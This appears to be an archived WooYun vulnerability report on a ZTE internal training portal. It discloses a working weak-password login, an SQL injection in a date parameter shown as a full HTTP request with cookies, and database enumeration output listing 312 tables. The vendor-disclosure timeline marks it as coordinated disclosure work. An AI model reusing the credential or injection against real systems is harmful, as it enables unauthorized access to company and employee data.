乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-12: 细节已通知厂商并且等待厂商处理中 2015-09-14: 厂商已经确认,细节仅向厂商公开 2015-09-24: 细节向核心白帽子及相关领域专家公开 2015-10-04: 细节向普通白帽子公开 2015-10-14: 细节向实习白帽子公开 2015-10-29: 细节向公众公开
2333333
URL:http://its.zte.com.cn/univ/login.aspx弱口令进去:6396000452/123456进入后台在配置师徒关系处存在POST型注入
日期为注入点
POST /univ/employeetrain/NewcomerCultivate/SetTeacherStudent.aspx HTTP/1.1Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*Referer: http://its.zte.com.cn/univ/employeetrain/NewcomerCultivate/SetTeacherStudent.aspxAccept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3; GWX:QUALIFIED)Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: its.zte.com.cnContent-Length: 891Pragma: no-cacheCookie: LoginTicket=; ASP.NET_SessionId=ve3lxxywaa1c5jrr5u0fic45; EdoorCulture=CurCulture=1&CurrentCulture=zh-CN; sessioncookieid=2015912152758888; ssocookieid=201508100956452015912152758888; username=10095645__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE_KEY=VIEWSTATE_ve3lxxywaa1c5jrr5u0fic45_192.168.28.70_635776688149445540&__VIEWSTATE=&__EVENTVALIDATION=%2FwEWIAL%2BraDpAgKz8dy8BQL0%2B4mHAgKVhO%2FXDgKN%2FuDeCgKoqY%2FDDwLp4Yr6AgLbxeClDQLB79GlBALbibmnDQK42KGWCgKq2KGWCgK3gv1tAqGW0fwNAq%2FznMIDAq%2FziOcKAq%2Fz9IsCAq%2Fz4LAJAq%2Fz7K4GAtrH29UGAq2S5aIKApfCh40LAtXujOkHAuDIlpkJAuTI1poJAuXI1poJAubI1poJAufI1poJAuDI1poJAsKJsc0OAuqSpeUFAtm2xxub8%2Blv7jaIZXMQqx0UyPb5vV2Yzj3%2FA7p7oJgUkfuFSw%3D%3D&txtUserId=20150810095645&txtLanguage=zh_CN&_ctl8=%2Funiv%2Femployeetrain%2FNewcomerCultivate%2FSetTeacherStudent.aspx&dtsRegDateS=&dtsRegDateE=&dtsrhStartDateS=&dtsrhStartDateE=&dtsrhEndDateS=2015-09-01&dtsrhEndDateE=2015-09-26&txtNameAndId=&txtDeptName=&btnSelect=%E6%9F%A5%E8%AF%A2&ztegriTeacherAndStudent%3A_ctl4%3A_numPageSizeFooter_1=10&ztegriTeacherAndStudent%3A_ctl4%3A_numPageFooter_1=1&querydepartno=
dtsrhEndDateS参数为注入点涉及13个库
当前数据库存在300多个表
web server operating system: Windowsweb application technology: ASP.NET 4.0.30319, ASP.NET, Nginxback-end DBMS: OracleDatabase: EMPTRAIN[312 tables]+--------------------------------+| A || AA || AAA || ATTACHMENT_MNG || BASE_CLIPBOARD || BASE_DEPTALLVIEW || BASE_DEPTALLVIEW_LINFAN || BASE_DEPT_SPECIAL_DIC || BASE_DICTIONARIES || C$_0HRT_MANAGER_DEPT || CM_ACTUAL_DEVELOPERS || CM_APPROVE_OPINION || CM_COURSE || CM_COURSE_LAN || CM_COURSE_SUBJECT || CM_DEVELOPERS || CM_EXAMINER_OPINION || CM_FRAME || CM_MATERIAL_ADDRESS || CM_MILESTONE || CM_TRAINEE_REMARK || DISTRIBUTED_DEPLOY_INFO || E$_HRT_MANAGER_DEPT || EMPLOYEEBASE_INFO_HR || HH_TMP || HRT_DEPT_DIC || HRT_DUTYGROUP_DIC || HRT_DUTYLEVEL_DIC || HRT_EMPLOYEEBASE_INFO_HR_DIC || HRT_EMPLOYEEBASE_INFO_V_DIC || HRT_MANAGER_DEPARTMENT_TNT_V_D || HRT_MANAGER_DEPT || HRT_MANAGER_DEPT_OPTLOG || HRT_REFUND_ACCOUNT_DIC || HRV_DEPARTMENT_S || HR_WFT_GIVE_RIGHT_DIC || ID_UPGRADE_BA_PERSON || ID_UPGRADE_COL || ID_UPGRADE_CONSTRAINT || ID_UPGRADE_DISABLEOBJ || ID_UPGRADE_EXECUTE_LOG || ID_UPGRADE_INDEX || ID_UPGRADE_TAB || ID_UPGRADE_TEMP || ID_UPGRADE_TRIGGER || MICROSOFTDTPROPERTIES || NC_CULTIVATE_PLAN || NC_CULTIVATE_PLAN_DEL || NC_CULTIVATE_PLAN_TMP || NC_FINAL_COMMENT || NC_PLAN_DETAIL || NC_PLAN_DETAIL_TEMPLATE || NC_PLAN_FILL || NC_PLAN_QUESTION_ITEM || NC_POST_SKILL || NC_QUESTION_ITEM || NC_SET_COMMENT_QUESTION || NC_STEP_REPORT || NC_TEACHER_STUDENT || NC_TEACHER_STUDENT_DEL || NC_TEACHER_STUDENT_TMP || NC_TEMPLATE || NC_TMP_TASK || PLAN_TABLE || PUB_EMPTYPE_CHANGE_ATM_DIC || PUB_SELFDEFINE_GROUP || PUB_SELFDEFINE_GROUP_MEMBER || PUB_TMP_EMPNO_CH || REMOVE_VIEW || RESUME_VIEW || RMS_ACCREDIT_OBJECT || RMS_ADMIN_DEPARTMENT || RMS_ADMIN_DEPARTMENT_IUBAK || RMS_CLASS_EQUIPMENT || RMS_CLASS_GRANT || RMS_EQUIPMENT_GRANT || RMS_OPERATE_OBJECT || RMS_OPERATE_OBJECT_RIGHT || RMS_PRIVILEGE || RMS_PRIVILEGE_IUBAK || RMS_RIGHT_INFO || RMS_RIGHT_INFO_IUBAK || RMS_SCHOOL_EQUIPMENT || RMS_SCHOOL_ROOM || RMS_SYSTEM || RMS_USER_ACCREDIT_OBJECT || RMS_USER_ACCREDIT_OBJECT_IUBAK || RM_REQUIREMENTS || RM_TEACHERS || RM_TRAINEES || RM_TRAINEE_AMOUNT || SKILL_VIEW || SNP_CHECK_TAB || SYNAUDITTABLE || SYS_CC_PERSONS || SYS_DEFAULT_VALUE || SYS_ERROR_LOG || SYS_OPERATE_LOG || T || TEMP_TEST || TGGF || THREADHANDTIMES || TMP_DEPT_NEW || TMP_DEPT_PROJECT || TMP_HRT_INFO || TMP_STUDENT || TNT_AGREEMENT_GRANT || TNT_AGREEMENT_INFO || TNT_BASE_BUDGET_STATUS_DIC || TNT_BASE_CERTIFICATE_EVAL_DIC || TNT_BASE_CERTIFICATE_LEVEL_DIC || TNT_BASE_CITY_DIC || TNT_BASE_COURSE || TNT_BASE_COURSEWARE_STATUS_DIC || TNT_BASE_COURSE_CURRENCY || TNT_BASE_COURSE_LANGUAGE || TNT_BASE_COURSE_LAN_DIC || TNT_BASE_COURSE_STATUS_DIC || TNT_BASE_COURSE_TEACHER || TNT_BASE_CULTURE_DIC || TNT_BASE_CULTURE_NAME_DIC || TNT_BASE_CURRENCY_DIC || TNT_BASE_DC_DIC || TNT_BASE_DUTYLEVEL_DIC || TNT_BASE_DUTY_DIC || TNT_BASE_FEE_STATUS_DIC || TNT_BASE_INSIDE_TEACHER || TNT_BASE_INSIDE_TEACHER_IUBAK || TNT_BASE_MANAGER_DIC || TNT_BASE_MONTHBUDGET_STATUS || TNT_BASE_NATION_DIC || TNT_BASE_OPEN_AREA || TNT_BASE_OUT_TEACHER || TNT_BASE_PERSONAL_PLAN_STATUS || TNT_BASE_PERSONAL_PLAN_ZONE || TNT_BASE_PERSONAL_PLAN_ZONE_IU || TNT_BASE_PLAN_CHANGE_ZONE || TNT_BASE_PROJ_STATUS_DIC || TNT_BASE_STUDENT_ATTEND_DIC || TNT_BASE_TABLE_DIC || TNT_BASE_TEACHER_APPLY_STATUS || TNT_BASE_TEACHER_FEE_DIC || TNT_BASE_TEACHER_TYPE || TNT_BASE_TEACHING_FEE || TNT_BASE_TEACHING_FEE_IUBAK || TNT_BASE_TRAINEE_TYPE_DIC || TNT_BASE_TRAIN_BELONG_DIC || TNT_BASE_TRAIN_STYLE_DIC || TNT_BASE_TRAIN_TYPE_DIC || TNT_COURSE_DATE || TNT_DIC_PROJECT_FEE_RATE || TNT_DIC_PROJECT_FEE_RATE_IUBAK || TNT_DIC_STUDY_FEE_RATE || TNT_DIC_STUDY_FEE_RATE_IMP || TNT_DIC_STUDY_FEE_RATE_IUBAK || TNT_DIC_TRAINGRADE || TNT_DIC_TRAINGRADE_IUBAK || TNT_EVAL_INFO || TNT_EVAL_QUESTION_ANSWER || TNT_EVAL_QUESTION_MAP || TNT_EVAL_TEMPLATE_MAP || TNT_FEE_ACCOUNT_DETAIL || TNT_FEE_APPRAISAL_STAT || TNT_FEE_BUDGET || TNT_FEE_BUDGET_DETAIL || TNT_FEE_BUDGET_IUBAK || TNT_FEE_COURSEFEETOTAL_TEMP || TNT_FEE_DECOMPOSE_DETAIL || TNT_FEE_DECOMPOSE_DETAIL_7914 || TNT_FEE_DECOMPOSE_DETAIL_IUBAK || TNT_FEE_DETAIL_MERGE || TNT_FEE_LOAN || TNT_FEE_MONTH_BUDGET || TNT_FEE_MONTH_BUDGET_IUBAK || TNT_FEE_PERSONAL_ACCOUNT || TNT_FEE_TEACHING_ACCOUNT || TNT_FEE_TEACHING_ACCOUNT_IUBAK || TNT_FEE_TEACHING_PAYMENT || TNT_FEE_TRAIN_AUDIT || TNT_FEE_TRAIN_BUDGET || TNT_FEE_TRAIN_BUDGET_IUBAK || TNT_FEE_TYPE || TNT_GROUP_TEACHER || TNT_INNER_ACCOUNT || TNT_INNER_ACCOUNT_DETAIL || TNT_INNER_ACCOUNT_DETAIL_IUBAK || TNT_INNER_ACCOUNT_IUBAK || TNT_LOG_PUBLIC_OPERATION || TNT_LOG_PUBLIC_OPERATION_1 || TNT_LOG_PUBLIC_OPERATION_1_IUB || TNT_LOG_PUBLIC_OPERATION_2 || TNT_LOG_PUBLIC_OPERATION_2_IUB || TNT_LOG_PUBLIC_OPERATION_IUBAK || TNT_LOG_TYPE || TNT_LOG_VISIT || TNT_NEWEMPLOYEE_TRAIN || TNT_NEWEMPLOYEE_TRAIN_IUBAK || TNT_NEWEMPLOYEE_TRAIN_TMP || TNT_OUTINFO_COURSE || TNT_OUTINFO_PROVIDER || TNT_OUTINFO_TEACHER || TNT_OUTINFO_TEACHER_COURSE || TNT_PM_ACCREDIT || TNT_PM_ACCREDIT_IUBAK || TNT_PM_ACCREDIT_SIGNUP || TNT_PM_ACCREDIT_SIGNUP_IUBAK || TNT_PM_ARTICLE || TNT_PM_COURSE || TNT_PM_COURSE_IUBAK || TNT_PM_COURSE_SCORE || TNT_PM_COURSE_SCORE_IUBAK || TNT_PM_COURSE_TMP || TNT_PM_EVAL || TNT_PM_EVAL_COURSE || TNT_PM_EVAL_ITEM || TNT_PM_INTERVIEW_EMAIL || TNT_PM_INTERVIEW_EMAIL_IUBAK || TNT_PM_PERSONAL_PLAN || TNT_PM_PERSONAL_PLAN_DETAIL || TNT_PM_PERSONAL_PLAN_IUBAK || TNT_PM_PROJECT || TNT_PM_PROJECT_BAK0313 || TNT_PM_PROJECT_IUBAK || TNT_PM_STUDENT || TNT_PM_STUDENT_20090709 || TNT_PM_STUDENT_CHECK || TNT_PM_STUDENT_INTERVIEW || TNT_PM_STUDENT_INTERVIEW_IUBAK || TNT_PM_STUDENT_IUBAK || TNT_PM_STUDENT_REPORT || TNT_PM_STUDENT_TMP || TNT_PM_TECH_CER_RATE || TNT_PM_TECH_CER_RATE_IUBAK || TNT_REGION_DEPT || TNT_REGION_DEPT_061215BK || TNT_REGION_DEPT_IUBAK || TNT_REGION_DIC || TNT_REGION_DIC_20061108BK || TNT_REGION_DIC_IUBAK || TNT_RESOURCE_COURSE || TNT_RESOURCE_COURSE_IUBAK || TNT_RESOURCE_EXTERNAL_TRAINER || TNT_RESOURCE_HOTEL || TNT_RESOURCE_TEACHER_APPLY || TNT_RESOURCE_TEACHER_APPLY_BAK || TNT_RESOURCE_TEACHER_APPLY_IUB || TNT_RESOURCE_TEACHER_EVAL || TNT_RESOURCE_TEACHER_EVAL_IUBA || TNT_RESOURCE_TEACHER_STAT || TNT_RIGHT_GROUP || TNT_RIGHT_GROUPROLE || TNT_RIGHT_ITEM || TNT_RIGHT_RIGHT || TNT_RIGHT_RIGHTTYPE_DIC || TNT_RIGHT_ROLE || TNT_RIGHT_ROLEITEM || TNT_RIGHT_ROLERIGHTTYPE || TNT_RIGHT_USER || TNT_SETTING_EVALUATION || TNT_SETTING_EVAL_ITEM || TNT_SETTING_MONTHLY_APPRAISAL || TNT_SETTING_MONTHLY_APPRAISAL_ || TNT_SETTING_RELEASE_INFO || TNT_SYS_INNER_DIC || TNT_TEACHER_COURSE_RELATIONS || TNT_TEACHER_LAN_RELATIONS || TNT_TRAIN_INFO_CATEGORY || TNT_TRAIN_INFO_CATEGORY_IUBAK || TNT_TRAIN_INFO_COURSE || TNT_TRAIN_INFO_COURSE_IUBAK || T_CHANGE_LC || VOTE_ACL || VOTE_CHOISE || VOTE_ITEM || VOTE_TYPE || VOTE_VOTER || VOTE_VOTER_IUBAK || WFT_ACTION_STATE || WFT_DEAD_QUEUE || WFT_DEFEAT_QUEUE || WFT_GIVE_RIGHT || WFT_GIVE_RIGHT_LOG || WFT_HANDLER_DIC || WFT_HANDLER_ROLE_DIC || WFT_OPERATE_TYPE_DIC || WFT_PRIVILEGE_DIC || WFT_ROLES_OPERATION_DEFINE || WFT_SEQUENCE_STREAM || WFT_SUCCEED_QUEUE || WFT_TEMPLATE || WFT_TEMPLATE_0857 || WFT_TEMPLATE_DEFINE || WFT_TEMPLATE_DEFINE_0857 || WFT_TEMPLATE_ENDWFEMP || WFT_TEMPLATE_ENDWFEMP_IUBAK || WFT_TEMPLATE_EXAM_PAGE || WFT_TEMPLATE_GRAPHICS || WFT_TEMPLATE_LOG || WFT_THREAD_ABOUT_PERSON || WFT_THREAD_ACL || WFT_THREAD_ACL_IUBAK || WFT_THREAD_END_STATUS_DIC || WFT_THREAD_HANDLE_TRACE || WFT_THREAD_HANDLE_TRACE_IUBAK || WFT_THREAD_HEAD || WFT_THREAD_HEAD_TMP || WFT_THREAD_LOG || WFT_THREAD_LOG_IUBAK || WFT_THREAD_RECORD || WFT_THREAD_RECORD_IUBAK || WFT_THREAD_STATUS_DIC || WFT_WAITING_QUEUE |+--------------------------------+
过滤
危害等级:高
漏洞Rank:19
确认时间:2015-09-14 08:54
感谢~
暂无